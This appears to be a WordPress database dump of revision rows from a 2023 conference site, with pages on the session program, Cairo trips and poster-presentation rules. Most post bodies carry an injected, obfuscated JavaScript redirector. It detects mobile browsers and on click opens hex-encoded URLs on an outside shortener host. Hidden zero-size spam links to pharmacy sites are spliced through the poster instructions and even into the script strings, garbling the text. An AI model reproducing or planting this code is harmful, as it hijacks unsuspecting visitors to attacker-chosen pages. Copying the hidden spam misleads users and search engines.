_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','inherit','closed','closed','','5122-revision-v1','','','2023-10-03 12:53:28','2023-10-03 12:53:28','',5122,'https://gsw2023.com/?p=5485',0,'revision','',0),
(5486,0,'2023-10-03 12:53:28','2023-10-03 12:53:28','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span><img src=\"https://gsw2023.com/wp-content/uploads/2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg\" alt=\"\" width=\"1250\" height=\"1500\" class=\"alignnone size-full wp-image-5433\" /><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.viagraseo.com/\">威而鋼</a>\n</span>2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Fun Trips in Cairo','','inherit','closed','closed','','5430-revision-v1','','','2023-10-03 12:53:28','2023-10-03 12:53:28','',5430,'https://gsw2023.com/?p=5486',0,'revision','',0),
(5487,0,'2023-10-03 12:53:28','2023-10-03 12:53:28','<span style=\"font-size: 12pt;\"><strong>Poster Design<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.curvbar.com/\">犀利士</a>\n</span> and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on ar<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>rival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <a href=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"><span style=\"color: #0000ff;\"><strong>Here</strong></span></a>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 